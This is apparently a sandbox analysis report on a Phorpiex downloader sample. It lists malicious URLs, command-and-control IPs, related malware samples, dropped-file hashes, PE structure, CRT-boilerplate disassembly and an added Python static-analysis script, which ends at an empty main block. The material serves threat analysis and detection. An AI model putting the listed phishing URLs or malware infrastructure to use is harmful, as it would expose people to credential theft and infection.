239.255.255.250 | https://share.fremontpeak.org/___.YzJ1OmNvZ2l3ZWIyOmM6bzpiNTEyZDAxNmZiN2I1MjU1MmE3OTQzOTdiZmE2NWEzZjo3OmQ0ZjU6ZDQ4OTQ1MWM1NjM2NzgxOWI0N2UyODgzNmYwYzIzOTkxYjZmOTA5ZjUyY2M5MTJiN2UzZTBiMmYwOTQ5NzhhNTpoOlQ6Tg | malicious | Unknown |
239.255.255.250 | https://www.google.rs/url?q=792CHARtTPSJ3J3wDyycT&sa=t&esrc=gxOmmFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=HARlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/ezraandhermes.com/bdman/authfyz//ylJB8Cet6FqlPfuIplTD1PwC/Z3JlZ29yeS5jYXJsdWNjaUBtYWxsaW5ja3JvZHQuY29t | malicious | Unknown |
239.255.255.250 | file.exe | malicious | Clipboard Hijacker, Cryptbot |
239.255.255.250 | file.exe | malicious | Cryptbot |
239.255.255.250 | http://theluckyhouse.vn/dnkdl | malicious | Unknown |
239.255.255.250 | http://englobe.infralogin.com/passresetconfirm/ODA0MDY/6qb-fdbad004345ade5cc1bb/ | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
twizt.net | U9jAFGWgPG.exe | malicious | Phorpiex, Xmrig | 185.215.113.66
twizt.net | ukOlLduCBM.exe | malicious | Phorpiex, Xmrig | 185.215.113.66
twizt.net | T52Z708x2p.exe | malicious | Phorpiex, Xmrig | 185.215.113.66
twizt.net | thcdVit1dX.exe | malicious | Phorpiex | 185.215.113.66
twizt.net | dgiX55cHyU.exe | malicious | Phorpiex, Xmrig | 185.215.113.66
twizt.net | SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exe | malicious | Phorpiex, Xmrig | 185.215.113.66
twizt.net | qRavA0Sorz.exe | malicious | Unknown | 185.215.113.66
twizt.net | qRavA0Sorz.exe | malicious | Unknown | 185.215.113.66
twizt.net | SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exe | malicious | Phorpiex, Xmrig | 185.215.113.66
twizt.net | SecuriteInfo.com.Trojan.DownLoader46.2135.7325.13890.exe | malicious | Phorpiex, Xmrig | 185.215.113.66
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ISPETCUZ | botx.m68k.elf | malicious | Mirai | 217.30.172.162
ISPETCUZ | U9jAFGWgPG.exe | malicious | Phorpiex, Xmrig | 217.30.171.37
ISPETCUZ | mips.elf | malicious | Mirai, Moobot | 217.30.172.111
ISPETCUZ | T52Z708x2p.exe | malicious | Phorpiex, Xmrig | 87.237.236.86
ISPETCUZ | lJ4EzPSKMj.exe | malicious | Phorpiex, Xmrig | 217.30.162.161
ISPETCUZ | file.exe | malicious | Phorpiex, Xmrig | 89.236.218.158
ISPETCUZ | dgiX55cHyU.exe | malicious | Phorpiex, Xmrig | 217.30.162.37
ISPETCUZ | GGXhCiYFBw.exe | malicious | Phorpiex, Xmrig | 217.30.163.15
ISPETCUZ | file.exe | malicious | Phorpiex | 217.30.160.219
ISPETCUZ | SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exe | malicious | Phorpiex | 87.237.236.86
TTC-ASJSCTranstelecomKZ | ukOlLduCBM.exe | malicious | Phorpiex, Xmrig | 178.22.171.158
TTC-ASJSCTranstelecomKZ | Us051y7j25.exe | malicious | Phorpiex, Xmrig | 178.22.171.158
TTC-ASJSCTranstelecomKZ | SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | malicious | Sality | 178.22.169.142
TTC-ASJSCTranstelecomKZ | n5h5BaL8q0.exe | malicious | Sality, XWorm | 178.22.169.142
TTC-ASJSCTranstelecomKZ | SecuriteInfo.com.Win32.Sector.30.19697.26848.exe | malicious | Sality | 178.22.169.142
TTC-ASJSCTranstelecomKZ | HZcInD4qL2.elf | malicious | Unknown | 94.141.238.249
TTC-ASJSCTranstelecomKZ | xJd712XMG6.exe | malicious | Phorpiex | 94.141.249.222
TTC-ASJSCTranstelecomKZ | file.exe | malicious | Phorpiex | 87.255.212.22
TTC-ASJSCTranstelecomKZ | TGmAf3feA5.elf | malicious | Mirai | 94.141.238.240
TTC-ASJSCTranstelecomKZ | kMQbvSnfVa.elf | malicious | Unknown | 2.57.112.230
MASTERHOST-ASMoscowRussiaRU | santi.exe | malicious | FormBook | 90.156.201.74
MASTERHOST-ASMoscowRussiaRU | arm.nn-20241122-0008.elf | malicious | Mirai, Okiru | 217.16.29.179
MASTERHOST-ASMoscowRussiaRU | arm4.elf | malicious | Mirai | 84.252.144.212
                                              U9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 90.156.163.55
                                              sora.ppc.elfGet hashmaliciousMiraiBrowse
                                              • 90.156.146.158
                                              ukOlLduCBM.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 90.156.163.10
                                              T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 90.156.162.79
                                              lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 90.156.160.86
                                              Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 90.156.160.66
                                              la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                              • 90.156.164.196
                                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                              • 185.215.113.16
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 185.215.113.16
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.206
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Users\user\AppData\Local\Temp\240016073.exeU9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                ukOlLduCBM.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                  T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                    lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                      Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                        thcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                                          bBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                            file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                              dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
Process: C:\Users\user\AppData\Local\Temp\240016073.exe
File Type: CSV text
Category: dropped
Size (bytes): 425
Entropy (8bit): 5.357964438493834
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
MD5: D8F8A79B5C09FCB6F44E8CFFF11BF7CA
SHA1: 669AFE705130C81BFEFECD7CC216E6E10E72CB81
SHA-256: 91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
SHA-512: C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
Malicious: false
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
Process: C:\Windows\sysnldcvmr.exe
File Type: data
Category: dropped
Size (bytes): 81152
Entropy (8bit): 7.998011911006711
Encrypted: true
SSDEEP: 1536:WvQLn+ioEm71GeGAOGQE7B7OTaVO8w2t0DX98HXp68iBeJ8DlE:EQy8eGetjQEV7o2+L+Xp68TF
MD5: 62C2757AA18C26E3E62E668C7D7A6BA7
SHA1: F67D1852F06F3ECE3192D7DA51A395AE45DDBCD3
SHA-256: 13833BCC37A158821DAD602493FF4751334191A01EBCB44A345649B7A6F81BE6
SHA-512: 4D27E9E97920CB84E8CC7DA010F5F4D91837DE6DBFE95253EA900E165884C2A16A712D91B216903BB19A47C4671F80F62CA99BB3828C0204C4C830F464592806
Malicious: false
Process: C:\Windows\sysnldcvmr.exe
File Type: data
Category: dropped
Size (bytes): 8960
Entropy (8bit): 7.980118959451248
Encrypted: false
SSDEEP: 192:8w3f/H9pFkeMpRmPIlHDCEkAH5gWPmEt3TXxl/6LkbgewuNvm:8snHrUVjbHH5g+mEt3z64bdNvm
MD5: 39F45EDB23427EBF63197CA138DDB282
SHA1: 4BE1B15912C08F73687C0E4C74AF0979C17FF7D5
SHA-256: 77FBB0D8630024634880C37DA59CE57D1B38C7E85BDCC14C697DB9E79C24E0DE
SHA-512: 410F6BAAD25B256DAEBFA5D8B8A495429C9E26E7DE767B2A0E6E4A75E543B77DBD0ABCA0335FB1F0D91E49E292B42CEDC6EDD72D25A3C4C62330E2B31C054CC6
Malicious: false
Process: C:\Users\user\Desktop\LM94OE0VNK.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 80896
Entropy (8bit): 6.424014659383267
Encrypted: false
SSDEEP: 1536:ZwjmKHFmav82kFifdWXwCsgTT+vr3Rzmxwz6fYc6on:+6tOMFif3CsKavr0xwz6gc6on
MD5: 0C883B1D66AFCE606D9830F48D69D74B
SHA1: FE431FE73A4749722496F19B3B3CA0B629B50131
SHA-256: D921FC993574C8BE76553BCF4296D2851E48EE39B958205E69BDFD7CF661D2B1
SHA-512: C047452A23EFAD4262479FBFEB5E23F9497D7CEFD4CBB58E869801206669C2A0759698C70D18050316798D5D939B989537FDCE3842AA742449F5E08ED7FA60A5
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 75%
Process: C:\Windows\sysnldcvmr.exe
File Type: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 8704
Entropy (8bit): 5.0125514402992275
Encrypted: false
SSDEEP: 192:Otk3w0++KjlRC5vVkDlBj9k2cugyJBLCsZ:OEYjlRAGlBj9kSgiLC0
MD5: CB8420E681F68DB1BAD5ED24E7B22114
SHA1: 416FC65D538D3622F5CA71C667A11DF88A927C31
SHA-256: 5850892F67F85991B31FC90F62C8B7791AFEB3C08AE1877D857AA2B59471A2EA
SHA-512: BAAABCC4AD5D409267A34ED7B20E4AFB4D247974BFC581D39AAE945E5BF8A673A1F8EACAE2E6783480C8BAAEB0A80D028274A202D456F13D0AF956AFA0110FDF
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 79%
Joe Sandbox View (other analyses in which this file was seen):
• Filename: U9jAFGWgPG.exe, Detection: malicious
• Filename: ukOlLduCBM.exe, Detection: malicious
• Filename: T52Z708x2p.exe, Detection: malicious
• Filename: lJ4EzPSKMj.exe, Detection: malicious
• Filename: Us051y7j25.exe, Detection: malicious
• Filename: thcdVit1dX.exe, Detection: malicious
• Filename: bBcZoComLl.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: dgiX55cHyU.exe, Detection: malicious
• Filename: GGXhCiYFBw.exe, Detection: malicious
Process: C:\Windows\sysnldcvmr.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 80896
Entropy (8bit): 6.424014659383267
Encrypted: false
SSDEEP: 1536:ZwjmKHFmav82kFifdWXwCsgTT+vr3Rzmxwz6fYc6on:+6tOMFif3CsKavr0xwz6gc6on
MD5: 0C883B1D66AFCE606D9830F48D69D74B
SHA1: FE431FE73A4749722496F19B3B3CA0B629B50131
SHA-256: D921FC993574C8BE76553BCF4296D2851E48EE39B958205E69BDFD7CF661D2B1
SHA-512: C047452A23EFAD4262479FBFEB5E23F9497D7CEFD4CBB58E869801206669C2A0759698C70D18050316798D5D939B989537FDCE3842AA742449F5E08ED7FA60A5
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 75%
Process: C:\Windows\sysnldcvmr.exe
File Type: data
Category: dropped
Size (bytes): 285
Entropy (8bit): 7.28515973169972
Encrypted: false
SSDEEP: 6:Iyu4QX3zGPoJz9fxrQM7j1td6tstnKAC2CooOaJX9laJz/0:IVFXjA8VdXd6YnK9B68
MD5: E9ACD9F780983202F14871AF9BDE3399
SHA1: A76E45F3B6B86D2EF2757F138A308158985FABBF
SHA-256: B4BE18FDC793F59785C72B9F7203B8DDE0221375436C2370DEC83B8243B793DE
SHA-512: 5967F2D1FEA02A15EF08F3B4243BB2AFFDB0778D803536096A9B7A3C7CF0D3BE5B77DBD1F116FF06FA08B7FB204C51DAB9450E9CC311C4E229194B540EFE6051
Malicious: false
Process: C:\Windows\sysnldcvmr.exe
File Type: data
Category: dropped
Size (bytes): 4096
Entropy (8bit): 4.903325145765822
Encrypted: false
SSDEEP: 96:VI7lxpje1/XGuiCk3jc5LdxJvxvWNpvoS7Noz2xGMl/Ug4si:keWCkTc5x4JRoni4P
MD5: EFFF03D9B6519B3EFEE1C681CAF49A04
SHA1: 3F3E615902795B94DA037AAC6F9329A643F52ACB
SHA-256: E27462FFBAD619BEB54C6E4AD9A551B82E19F73F463CC7D98DD6891E49A0B7A0
SHA-512: 2B4F607542291E0ADE883889928EAC9A164A0900117FDA8B1B2759D07E10B0F7CCA04411966E1EAC3A936BBDB16AF78ED7ACD146EC40A66CDDFB1BDAD8C44848
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\2374323789.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 80896
Entropy (8bit): 6.424014659383267
Encrypted: false
SSDEEP: 1536:ZwjmKHFmav82kFifdWXwCsgTT+vr3Rzmxwz6fYc6on:+6tOMFif3CsKavr0xwz6gc6on
MD5: 0C883B1D66AFCE606D9830F48D69D74B
SHA1: FE431FE73A4749722496F19B3B3CA0B629B50131
SHA-256: D921FC993574C8BE76553BCF4296D2851E48EE39B958205E69BDFD7CF661D2B1
SHA-512: C047452A23EFAD4262479FBFEB5E23F9497D7CEFD4CBB58E869801206669C2A0759698C70D18050316798D5D939B989537FDCE3842AA742449F5E08ED7FA60A5
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 75%
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):5.073117059268331
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:LM94OE0VNK.exe
                                                                  File size:10'240 bytes
                                                                  MD5:8ce09f13942ab5bcb81b175996c8385f
                                                                  SHA1:6fa685d66ac5fff4e9d984dc1903c47a1a6b6cbd
                                                                  SHA256:757bf8be40693456e7cdee5c53416d1cb223da5f7d0b9d55f4aca95f6a57605d
                                                                  SHA512:11ae4651b3dd55355b2cb7bf2f6b042dea47bb895f898d967d63ee652652c633cc5becf31cb2fd7f8797b238b264195d09d4e08211b797eae29e2a7bb31b277f
                                                                  SSDEEP:96:7L0paShFKPqYTdGLDad04DCcR+58DsrVJQsfuJxGEOaRh2qhRC7tCEMSI:72hBMGtkR+iDswsWJxTOchthyMB
                                                                  TLSH:BF22290B7DCA40A1E3904CF047F2878A8BFE94631B92B2CFB7B3C2595F5135184966E6
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k..Y/.../.../...&.`.-...&.f.....&.p.:....s..".../.......&.w.,...&.b.....Rich/...........................PE..L...t4Hg...........
                                                                  Icon Hash:90cececece8e8eb0
                                                                  Entrypoint:0x401701
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x67483474 [Thu Nov 28 09:14:28 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:e6eef170b092805b77c0546e3604d99f
Instruction (disassembly from the entrypoint 0x401701; branch and call targets are shown as sandbox-rebased addresses. The routines below match the VS2008 CRT startup boilerplate that the import table also points to, not sample-specific logic; the IAT slot names in the comments are inferred from those well-known patterns and the import list, the downloader logic itself lives elsewhere in .text)
call 00007F36744F4F57h                 ; CRT entry pattern: __security_init_cookie, then jump to __tmainCRTStartup
jmp 00007F36744F491Bh
mov edi, edi                           ; 0x40170B: hot-patchable prologue of the filter routine registered below
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]           ; EXCEPTION_POINTERS*
mov eax, dword ptr [eax]               ; ->ExceptionRecord
cmp dword ptr [eax], E06D7363h         ; ExceptionCode == 0xE06D7363 (MSVC C++ exception)
jne 00007F36744F4C0Ch
cmp dword ptr [eax+10h], 03h           ; NumberParameters == 3
jne 00007F36744F4C06h
mov eax, dword ptr [eax+14h]           ; ExceptionInformation[0]
cmp eax, 19930520h                     ; MSVC C++ EH magic numbers (0x19930520..22, 0x01994000)
je 00007F36744F4BF7h
cmp eax, 19930521h
je 00007F36744F4BF0h
cmp eax, 19930522h
je 00007F36744F4BE9h
cmp eax, 01994000h
jne 00007F36744F4BE7h
call 00007F36744F4FACh                 ; unhandled C++ exception: terminate (msvcr90!?terminate@@YAXXZ is imported)
xor eax, eax
pop ebp
retn 0004h
push 0040170Bh                         ; register the filter above ...
call dword ptr [00402048h]             ; ... through the IAT (0x402000-0x40210C); SetUnhandledExceptionFilter is imported
xor eax, eax
ret
int3
jmp dword ptr [004020B8h]              ; import thunk
push 00000014h                         ; SEH prolog (frame 0x14, scope table 0x402440): start of the CRT _onexit wrapper
push 00402440h
call 00007F36744F4E43h
push dword ptr [00403384h]             ; encoded __onexitbegin
mov esi, dword ptr [0040206Ch]         ; _decode_pointer via the IAT
call esi
pop ecx
mov dword ptr [ebp-1Ch], eax
cmp eax, FFFFFFFFh                     ; no exit table yet ...
jne 00007F36744F4BEEh
push dword ptr [ebp+08h]
call dword ptr [00402068h]             ; ... so hand the function to msvcr90!_onexit directly
pop ecx
jmp 00007F36744F4C49h
push 00000008h
call 00007F36744F4F6Dh                 ; _lock(8): exit-table lock
pop ecx
and dword ptr [ebp-04h], 00000000h
push dword ptr [00403384h]
call esi                               ; decode __onexitbegin ...
mov dword ptr [ebp-1Ch], eax
push dword ptr [00403380h]
call esi                               ; ... and __onexitend
pop ecx
pop ecx
mov dword ptr [ebp-20h], eax
lea eax, dword ptr [ebp-20h]
push eax
lea eax, dword ptr [ebp-1Ch]
push eax
push dword ptr [ebp+08h]
mov esi, dword ptr [00402064h]         ; __dllonexit(func, &begin, &end)
call esi
                                                                  Programming Language:
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [ASM] VS2008 SP1 build 30729
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2005 build 50727
                                                                  • [C++] VS2008 SP1 build 30729
                                                                  • [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x247c | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5000 | 0x19c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x23b0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x10c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xc5a | 0xe00 | c033fa3be1360d8f21205d8514b59106 | False | 0.5775669642857143 | data | 5.628875405373284 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2000 | 0xa7c | 0xc00 | 70da5f280c9a4a4dbcb3a3a467843d58 | False | 0.4375 | data | 4.431376231305874 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3000 | 0x38c | 0x200 | 202a0f14ba4a024e6a35d5895669b769 | False | 0.060546875 | data | 0.35275948821577235 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4000 | 0x2b0 | 0x400 | 554d0cedd69e96ee00c8324ce4da604c | False | 0.3623046875 | data | 5.194459669718395 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x5000 | 0x20c | 0x400 | 9d72d8e8c5d99e604065fd0bedfb410c | False | 0.4111328125 | data | 3.3645885903769637 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x4058 | 0x256 | ASCII text, with CRLF line terminators | English | United States | 0.5100334448160535
DLL | Import
SHLWAPI.dll | PathFileExistsW
MSVCR90.dll | __set_app_type, ?terminate@@YAXXZ, _unlock, __dllonexit, _encode_pointer, _onexit, _decode_pointer, _except_handler4_common, _invoke_watson, _controlfp_s, _crt_debugger_hook, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _configthreadlocale, _initterm_e, _initterm, _acmdln, exit, _ismbblead, _XcptFilter, _exit, _cexit, __getmainargs, _amsg_exit, srand, rand, memset, _lock
WININET.dll | InternetOpenW, InternetOpenUrlW, InternetOpenUrlA, InternetOpenA, InternetCloseHandle, InternetReadFile
urlmon.dll | URLDownloadToFileW
KERNEL32.dll | GetCurrentThreadId, QueryPerformanceCounter, InterlockedExchange, GetTickCount, WriteFile, DeleteFileW, CreateProcessW, Sleep, ExpandEnvironmentStringsW, CreateFileW, CloseHandle, GetCurrentProcessId, GetSystemTimeAsFileTime, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoA, SetUnhandledExceptionFilter, InterlockedCompareExchange
USER32.dll | wsprintfW
SHELL32.dll | ShellExecuteW
Language of compilation system | Country where language is spoken | Map
English | United States |
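The section and import tables above are enough to sanity-check the static picture without the sample in hand. The following Python is an added example, not Joe Sandbox code and not anything from the sample: it recomputes an import hash from the listed imports the way pefile's imphash does (this reproduces the reported Import Hash only if the DLL order listed here is the import-directory order, which the page does not confirm), locates the entrypoint in the section table, applies the usual packer heuristics, and separates the VS2008 CRT's own imports (IsDebuggerPresent among them) from the WININET/urlmon/CreateProcessW set that matches the downloader behaviour. Section and import values are transcribed from the tables above; the thresholds and the CRT boilerplate list are my own.

```python
import hashlib

# Values transcribed from the report's static section (constructed input for this example).
IMAGE_BASE = 0x400000
ENTRYPOINT = 0x401701
REPORTED_IMPHASH = "e6eef170b092805b77c0546e3604d99f"

# (name, virtual address, virtual size, raw size, entropy, characteristics)
SECTIONS = [
    (".text",  0x1000, 0xc5a, 0xe00, 5.628875405373284,   {"CODE", "EXECUTE", "READ"}),
    (".rdata", 0x2000, 0xa7c, 0xc00, 4.431376231305874,   {"INITIALIZED_DATA", "READ"}),
    (".data",  0x3000, 0x38c, 0x200, 0.35275948821577235, {"INITIALIZED_DATA", "READ", "WRITE"}),
    (".rsrc",  0x4000, 0x2b0, 0x400, 5.194459669718395,   {"INITIALIZED_DATA", "READ"}),
    (".reloc", 0x5000, 0x20c, 0x400, 3.3645885903769637,  {"INITIALIZED_DATA", "DISCARDABLE", "READ"}),
]

# Import table in the order the report lists it (assumed here to be import-directory order).
IMPORTS = [
    ("SHLWAPI.dll", ["PathFileExistsW"]),
    ("MSVCR90.dll", "__set_app_type, ?terminate@@YAXXZ, _unlock, __dllonexit, _encode_pointer, _onexit, _decode_pointer, _except_handler4_common, _invoke_watson, _controlfp_s, _crt_debugger_hook, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _configthreadlocale, _initterm_e, _initterm, _acmdln, exit, _ismbblead, _XcptFilter, _exit, _cexit, __getmainargs, _amsg_exit, srand, rand, memset, _lock".split(", ")),
    ("WININET.dll", ["InternetOpenW", "InternetOpenUrlW", "InternetOpenUrlA", "InternetOpenA", "InternetCloseHandle", "InternetReadFile"]),
    ("urlmon.dll", ["URLDownloadToFileW"]),
    ("KERNEL32.dll", "GetCurrentThreadId, QueryPerformanceCounter, InterlockedExchange, GetTickCount, WriteFile, DeleteFileW, CreateProcessW, Sleep, ExpandEnvironmentStringsW, CreateFileW, CloseHandle, GetCurrentProcessId, GetSystemTimeAsFileTime, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoA, SetUnhandledExceptionFilter, InterlockedCompareExchange".split(", ")),
    ("USER32.dll", ["wsprintfW"]),
    ("SHELL32.dll", ["ShellExecuteW"]),
]

# KERNEL32 APIs the VS2008 CRT startup pulls in by itself (security cookie, GS-failure
# report, unhandled-exception filter). Seeing them says "linked with VS2008", not "anti-debug".
CRT_BOILERPLATE = {"GetCurrentThreadId", "QueryPerformanceCounter", "InterlockedExchange", "GetTickCount",
                   "GetCurrentProcessId", "GetSystemTimeAsFileTime", "TerminateProcess", "GetCurrentProcess",
                   "UnhandledExceptionFilter", "IsDebuggerPresent", "GetStartupInfoA",
                   "SetUnhandledExceptionFilter", "InterlockedCompareExchange"}


def imphash(imports):
    """Import hash as pefile computes it: 'lib.func' entries (lower-case, library extension
    stripped), joined with commas in import-directory order, then MD5. Ordinal-only imports
    (none here) would need pefile's ordinal name tables."""
    parts = []
    for dll, funcs in imports:
        lib = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        parts.extend(f"{lib}.{f.lower()}" for f in funcs)
    return hashlib.md5(",".join(parts).encode()).hexdigest()


def section_of(address, sections, image_base=IMAGE_BASE):
    """Name of the section whose virtual range contains the absolute address, else None."""
    rva = address - image_base
    for name, vaddr, vsize, *_ in sections:
        if vaddr <= rva < vaddr + vsize:
            return name
    return None


def packing_indicators(sections, entrypoint):
    """Cheap packer / loader-stub heuristics over the section table; empty list means none fired."""
    findings = []
    for name, _vaddr, vsize, rsize, entropy, chars in sections:
        if entropy > 7.0:
            findings.append(f"{name}: entropy {entropy:.2f}, likely compressed or encrypted")
        if vsize > 2 * max(rsize, 1):
            findings.append(f"{name}: virtual 0x{vsize:x} far exceeds raw 0x{rsize:x}, room for unpacked code")
        if {"EXECUTE", "WRITE"} <= chars:
            findings.append(f"{name}: writable and executable")
    ep = section_of(entrypoint, sections)
    if ep != ".text":
        findings.append(f"entrypoint 0x{entrypoint:x} lies in {ep}, not .text")
    return findings


def capability_profile(imports):
    """Group the non-CRT imports into the behaviours the dynamic part of the report observed."""
    groups = {
        "download": {"URLDownloadToFileW", "InternetOpenUrlW", "InternetOpenUrlA", "InternetReadFile"},
        "execute": {"CreateProcessW", "ShellExecuteW"},
        "drop": {"CreateFileW", "WriteFile", "DeleteFileW", "ExpandEnvironmentStringsW", "PathFileExistsW"},
    }
    present = {f for _, funcs in imports for f in funcs} - CRT_BOILERPLATE
    return {cap: sorted(present & apis) for cap, apis in groups.items() if present & apis}


if __name__ == "__main__":
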